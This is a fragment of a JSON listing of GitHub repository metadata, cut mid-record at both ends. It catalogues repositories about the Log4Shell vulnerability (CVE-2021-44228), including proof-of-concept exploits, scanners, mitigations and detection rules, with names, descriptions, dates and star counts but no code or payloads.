"https:\/\/github.com\/Panyaprach\/Prove-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-12T20:31:19Z", + "updated_at": "2024-04-28T19:39:24Z", + "pushed_at": "2022-01-14T10:08:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437660117, + "name": "Log4j-RCE", + "full_name": "momos1337\/Log4j-RCE", + "owner": { + "login": "momos1337", + "id": 64172550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64172550?v=4", + "html_url": "https:\/\/github.com\/momos1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momos1337\/Log4j-RCE", + "description": "Log4j RCE - (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-12T21:26:44Z", + "updated_at": "2024-08-12T20:18:50Z", + "pushed_at": "2021-12-13T00:54:22Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bughunter", + "cve-2021-44228", + "exploit", + "hacking", + "log4j", + "log4j-rce", + "rce", + "remote-code-execution" + ], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437660360, + "name": "cve-2021-44228-log4j-mitigation", + "full_name": "palominoinc\/cve-2021-44228-log4j-mitigation", + "owner": { + "login": "palominoinc", + "id": 7401270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7401270?v=4", + "html_url": "https:\/\/github.com\/palominoinc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/palominoinc\/cve-2021-44228-log4j-mitigation", + "description": "Mitigate against log4j vulnerability", + "fork": false, + "created_at": "2021-12-12T21:28:09Z", + "updated_at": "2021-12-16T15:15:07Z", + "pushed_at": "2021-12-16T15:15:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 437663314, + "name": "log4j-poc", + "full_name": "cyberxml\/log4j-poc", + "owner": { + "login": "cyberxml", + "id": 10391872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10391872?v=4", + "html_url": "https:\/\/github.com\/cyberxml", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberxml\/log4j-poc", + "description": "A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell", + "fork": false, + "created_at": "2021-12-12T21:45:33Z", + "updated_at": "2024-08-12T20:18:50Z", + "pushed_at": "2022-12-21T21:11:58Z", + "stargazers_count": 68, + "watchers_count": 68, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "exploit", + "log4j", + "log4shell", + "poc" + ], + "visibility": "public", + "forks": 34, + "watchers": 68, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 437664611, + "name": "Log4J-CVE-2021-44228-RCE", + "full_name": "corneacristian\/Log4J-CVE-2021-44228-RCE", + "owner": { + "login": "corneacristian", + "id": 59137279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59137279?v=4", + "html_url": "https:\/\/github.com\/corneacristian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corneacristian\/Log4J-CVE-2021-44228-RCE", + "description": "Log4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE)", + "fork": false, + "created_at": "2021-12-12T21:52:53Z", + "updated_at": "2023-07-20T04:33:57Z", + "pushed_at": "2021-12-12T22:36:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437674455, + "name": "nse-log4shell", + "full_name": "Diverto\/nse-log4shell", + "owner": { + "login": "Diverto", + "id": 11384089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11384089?v=4", + "html_url": "https:\/\/github.com\/Diverto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diverto\/nse-log4shell", + "description": "Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-12T22:52:02Z", + "updated_at": "2024-10-04T14:26:27Z", + "pushed_at": "2021-12-20T15:34:21Z", + "stargazers_count": 349, + "watchers_count": 349, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 349, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 437674999, + "name": "log4py", + "full_name": "dotPY-hax\/log4py", + "owner": { + "login": "dotPY-hax", + "id": 67259802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67259802?v=4", + "html_url": "https:\/\/github.com\/dotPY-hax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dotPY-hax\/log4py", + "description": "pythonic pure python RCE exploit for CVE-2021-44228 log4shell", + "fork": false, + "created_at": "2021-12-12T22:55:25Z", + "updated_at": "2022-11-09T18:14:43Z", + "pushed_at": "2021-12-12T23:49:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "exploit", + "log4j", + "python", + "pythonic", + "rce" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437681598, + "name": "CVE-2021-44228-PoC", + "full_name": "sunnyvale-it\/CVE-2021-44228-PoC", + "owner": { + "login": "sunnyvale-it", + "id": 44291039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4", + "html_url": "https:\/\/github.com\/sunnyvale-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2021-44228-PoC", + "description": "CVE-2021-44228 (Log4Shell) Proof of Concept", + "fork": false, + "created_at": "2021-12-12T23:37:39Z", + "updated_at": "2024-07-09T05:36:30Z", + "pushed_at": "2021-12-13T21:23:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cybersecurity", + "java", + "log4j", + "log4j2", + "security" + ], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 437685288, + "name": "log4j2-CVE-2021-44228", + "full_name": "maxant\/log4j2-CVE-2021-44228", + "owner": { + "login": "maxant", + "id": 1108507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1108507?v=4", + "html_url": "https:\/\/github.com\/maxant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maxant\/log4j2-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-13T00:02:54Z", + "updated_at": "2021-12-19T19:56:12Z", + "pushed_at": "2021-12-19T19:56:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437687048, + "name": "fail2ban-log4j", + "full_name": "atnetws\/fail2ban-log4j", + "owner": { + "login": "atnetws", + "id": 44603839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44603839?v=4", + "html_url": "https:\/\/github.com\/atnetws", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/atnetws\/fail2ban-log4j", + "description": "fail2ban filter that catches attacks againts log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T00:14:31Z", + "updated_at": "2022-07-21T09:23:18Z", + "pushed_at": "2022-01-06T20:00:17Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437687082, + "name": "cve-2021-44228", + "full_name": "kimobu\/cve-2021-44228", + "owner": { + "login": "kimobu", + "id": 18669130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18669130?v=4", + "html_url": "https:\/\/github.com\/kimobu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kimobu\/cve-2021-44228", + "description": "Some files for red team\/blue team investigations into CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T00:14:45Z", + "updated_at": "2023-08-15T12:50:48Z", + "pushed_at": "2021-12-14T19:46:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437688500, + "name": "anti-jndi", + "full_name": "ph0lk3r\/anti-jndi", + "owner": { + "login": "ph0lk3r", + "id": 1352675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1352675?v=4", + "html_url": "https:\/\/github.com\/ph0lk3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph0lk3r\/anti-jndi", + "description": "Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.", + "fork": false, + "created_at": "2021-12-13T00:23:20Z", + "updated_at": "2021-12-13T22:21:20Z", + "pushed_at": "2021-12-13T22:21:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437704633, + "name": "Log4j-check", + "full_name": "bigsizeme\/Log4j-check", + "owner": { + "login": "bigsizeme", + "id": 17845094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17845094?v=4", + "html_url": "https:\/\/github.com\/bigsizeme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigsizeme\/Log4j-check", + "description": "log4J burp被扫插件、CVE-2021-44228、支持dnclog.cn和burp内置DNS、可配合JNDIExploit生成payload", + "fork": false, + "created_at": "2021-12-13T01:55:51Z", + "updated_at": "2024-10-25T12:16:34Z", + "pushed_at": "2021-12-13T09:18:19Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 69, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437709337, + "name": "exploit-CVE-2021-44228", + "full_name": "pedrohavay\/exploit-CVE-2021-44228", + "owner": { + "login": "pedrohavay", + "id": 18234370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18234370?v=4", + "html_url": "https:\/\/github.com\/pedrohavay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrohavay\/exploit-CVE-2021-44228", + "description": "This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228).", + "fork": false, + "created_at": "2021-12-13T02:18:57Z", + "updated_at": "2024-01-30T05:00:44Z", + "pushed_at": "2021-12-13T16:35:58Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437721429, + "name": "log4j-nullroute", + "full_name": "0xRyan\/log4j-nullroute", + "owner": { + "login": "0xRyan", + "id": 87556614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87556614?v=4", + "html_url": "https:\/\/github.com\/0xRyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRyan\/log4j-nullroute", + "description": "Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes", + "fork": false, + "created_at": "2021-12-13T03:15:42Z", + "updated_at": "2024-08-12T20:18:50Z", + "pushed_at": "2021-12-14T23:03:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437729534, + "name": "CVE-2021-44228", + "full_name": "fireeye\/CVE-2021-44228", + "owner": { + "login": "fireeye", + "id": 4984788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4984788?v=4", + "html_url": "https:\/\/github.com\/fireeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fireeye\/CVE-2021-44228", + "description": "OpenIOC rules to facilitate hunting for indicators of compromise", + "fork": false, + "created_at": "2021-12-13T03:55:32Z", + "updated_at": "2024-08-05T03:09:51Z", + "pushed_at": "2022-01-07T14:25:33Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 38, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 437729997, + "name": "log4j-scan", + "full_name": "fullhunt\/log4j-scan", + "owner": { + "login": "fullhunt", + "id": 34830403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34830403?v=4", + "html_url": "https:\/\/github.com\/fullhunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fullhunt\/log4j-scan", + "description": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 ", + "fork": false, + "created_at": "2021-12-13T03:57:50Z", + "updated_at": "2024-11-28T15:39:55Z", + "pushed_at": "2022-11-23T18:23:24Z", + "stargazers_count": 3408, + "watchers_count": 3408, + "has_discussions": true, + "forks_count": 740, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 740, + "watchers": 3408, + "score": 0, + "subscribers_count": 55 + }, + { + "id": 437733080, + "name": "log4j_checker_beta", + "full_name": "rubo77\/log4j_checker_beta", + "owner": { + "login": "rubo77", + "id": 1591563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1591563?v=4", + "html_url": "https:\/\/github.com\/rubo77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rubo77\/log4j_checker_beta", + "description": "a fast check, if your server could be vulnerable to CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T04:14:18Z", + "updated_at": "2024-10-12T16:42:12Z", + "pushed_at": "2022-01-21T11:43:49Z", + "stargazers_count": 250, + "watchers_count": 250, + "has_discussions": true, + "forks_count": 90, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 90, + "watchers": 250, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 437766799, + "name": "Log4j-RCE-Exploiter", + "full_name": "thecyberneh\/Log4j-RCE-Exploiter", + "owner": { + "login": "thecyberneh", + "id": 75005384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75005384?v=4", + "html_url": "https:\/\/github.com\/thecyberneh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thecyberneh\/Log4j-RCE-Exploiter", + "description": "Scanner for Log4j RCE CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T06:53:01Z", + "updated_at": "2024-08-12T20:18:51Z", + "pushed_at": "2022-07-06T00:37:55Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437769581, + "name": "log4j2", + "full_name": "halibobor\/log4j2", + "owner": { + "login": "halibobor", + "id": 96046545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96046545?v=4", + "html_url": "https:\/\/github.com\/halibobor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halibobor\/log4j2", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T07:03:50Z", + "updated_at": "2021-12-13T09:39:44Z", + "pushed_at": "2021-12-13T09:30:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "jmi", + "log4j2" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437771197, + "name": "log4j-cve-code-search-resources", + "full_name": "sourcegraph\/log4j-cve-code-search-resources", + "owner": { + "login": "sourcegraph", + "id": 3979584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3979584?v=4", + "html_url": "https:\/\/github.com\/sourcegraph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sourcegraph\/log4j-cve-code-search-resources", + "description": "Using code search to help fix\/mitigate log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T07:10:11Z", + "updated_at": "2022-11-09T18:14:44Z", + "pushed_at": "2024-04-01T21:00:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 40 + }, + { + "id": 437774679, + "name": "Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832", + "full_name": "thedevappsecguy\/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832", + "owner": { + "login": "thedevappsecguy", + "id": 27088213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27088213?v=4", + "html_url": "https:\/\/github.com\/thedevappsecguy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thedevappsecguy\/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832", + "description": "Log4J CVE-2021-44228 : Mitigation Cheat Sheet", + "fork": false, + "created_at": "2021-12-13T07:24:02Z", + "updated_at": "2022-10-26T08:46:27Z", + "pushed_at": "2022-01-03T17:43:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437781188, + "name": "CVE-2021-44228", + "full_name": "helsecert\/CVE-2021-44228", + "owner": { + "login": "helsecert", + "id": 2202200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202200?v=4", + "html_url": "https:\/\/github.com\/helsecert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/helsecert\/CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-13T07:48:49Z", + "updated_at": "2021-12-19T23:28:13Z", + "pushed_at": "2022-01-04T08:15:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 437784907, + "name": "aws-log4j-mitigations", + "full_name": "markuman\/aws-log4j-mitigations", + "owner": { + "login": "markuman", + "id": 3920157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3920157?v=4", + "html_url": "https:\/\/github.com\/markuman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markuman\/aws-log4j-mitigations", + "description": "CVE-2021-44228 log4j mitigation using aws wafv2 with ansible", + "fork": false, + "created_at": "2021-12-13T08:01:55Z", + "updated_at": "2021-12-13T08:05:42Z", + "pushed_at": "2021-12-13T08:03:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ansible", + "aws", + "cve-2021-44228", + "log4j", + "mitigation", + "waf" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437788180, + "name": "Log4shell", + "full_name": "tuyenee\/Log4shell", + "owner": { + "login": "tuyenee", + "id": 29719729, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29719729?v=4", + "html_url": "https:\/\/github.com\/tuyenee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuyenee\/Log4shell", + "description": "A lab for playing around with the Log4J CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T08:13:07Z", + "updated_at": "2024-08-12T20:18:51Z", + "pushed_at": "2021-12-13T09:26:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437795998, + "name": "Log4j-CVE-2021-44228", + "full_name": "JiuBanSec\/Log4j-CVE-2021-44228", + "owner": { + "login": "JiuBanSec", + "id": 57030243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57030243?v=4", + "html_url": "https:\/\/github.com\/JiuBanSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JiuBanSec\/Log4j-CVE-2021-44228", + "description": "Log4j Remote Code Injection (Apache Log4j 2.x < 2.15.0-rc2)", + "fork": false, + "created_at": "2021-12-13T08:40:13Z", + "updated_at": "2023-08-15T12:50:45Z", + "pushed_at": "2021-12-13T12:01:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437797086, + "name": "Log4Shell-CVE-2021-44228-ENV", + "full_name": "ycdxsb\/Log4Shell-CVE-2021-44228-ENV", + "owner": { + "login": "ycdxsb", + "id": 32149596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4", + "html_url": "https:\/\/github.com\/ycdxsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ycdxsb\/Log4Shell-CVE-2021-44228-ENV", + "description": "Log4Shell Docker Env", + "fork": false, + "created_at": "2021-12-13T08:43:45Z", + "updated_at": "2023-08-15T12:50:53Z", + "pushed_at": "2021-12-14T02:54:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437797971, + "name": "Sitecore.Solr-log4j-mitigation", + "full_name": "avwolferen\/Sitecore.Solr-log4j-mitigation", + "owner": { + "login": "avwolferen", + "id": 11447968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11447968?v=4", + "html_url": "https:\/\/github.com\/avwolferen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/avwolferen\/Sitecore.Solr-log4j-mitigation", + "description": "This repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T08:46:41Z", + "updated_at": "2022-01-05T17:02:45Z", + "pushed_at": "2022-10-19T14:57:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437799663, + "name": "log4j-scanner-CVE-2021-44228", + "full_name": "kek-Sec\/log4j-scanner-CVE-2021-44228", + "owner": { + "login": "kek-Sec", + "id": 28791067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28791067?v=4", + "html_url": "https:\/\/github.com\/kek-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kek-Sec\/log4j-scanner-CVE-2021-44228", + "description": "Simple tool for scanning entire directories for attempts of CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T08:51:56Z", + "updated_at": "2024-08-12T20:18:51Z", + "pushed_at": "2021-12-14T07:57:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437816961, + "name": "log4shell-spring-framework-research", + "full_name": "Camphul\/log4shell-spring-framework-research", + "owner": { + "login": "Camphul", + "id": 23475815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23475815?v=4", + "html_url": "https:\/\/github.com\/Camphul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Camphul\/log4shell-spring-framework-research", + "description": "Research into the implications of CVE-2021-44228 in Spring based applications.", + "fork": false, + "created_at": "2021-12-13T09:48:04Z", + "updated_at": "2021-12-15T10:33:35Z", + "pushed_at": "2021-12-15T10:33:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437820134, + "name": "cve-2021-44228-log4j-exploits", + "full_name": "lov3r\/cve-2021-44228-log4j-exploits", + "owner": { + "login": "lov3r", + "id": 33676682, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33676682?v=4", + "html_url": "https:\/\/github.com\/lov3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lov3r\/cve-2021-44228-log4j-exploits", + "description": "CVE-2021-4428 复现", + "fork": false, + "created_at": "2021-12-13T09:58:11Z", + "updated_at": "2022-09-05T15:53:24Z", + "pushed_at": "2021-12-13T10:22:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437838249, + "name": "log4jScan", + "full_name": "sinakeshmiri\/log4jScan", + "owner": { + "login": "sinakeshmiri", + "id": 72389059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72389059?v=4", + "html_url": "https:\/\/github.com\/sinakeshmiri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinakeshmiri\/log4jScan", + "description": "simple python scanner to check if your network is vulnerable to CVE-2021-44228", + "fork": false, + "created_at": "2021-12-13T10:59:50Z", + "updated_at": "2024-10-08T07:36:17Z", + "pushed_at": "2021-12-13T12:16:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437840280, + "name": "Log4J-Scanner", + "full_name": "0xDexter0us\/Log4J-Scanner", + "owner": { + "login": "0xDexter0us", + "id": 76158271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76158271?v=4", + "html_url": "https:\/\/github.com\/0xDexter0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDexter0us\/Log4J-Scanner", + "description": "Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.", + "fork": false, + "created_at": "2021-12-13T11:06:46Z", + "updated_at": "2024-09-09T07:15:00Z", + "pushed_at": "2021-12-26T09:58:06Z", + "stargazers_count": 101, + "watchers_count": 101, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 101, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 437847140, + "name": "Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228", + "full_name": "LutziGoz\/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228", + "owner": { + "login": "LutziGoz", + "id": 45577616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45577616?v=4", + "html_url": "https:\/\/github.com\/LutziGoz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LutziGoz\/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-13T11:29:57Z", + "updated_at": "2022-08-14T12:05:18Z", + "pushed_at": "2022-02-22T00:21:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437848570, + "name": 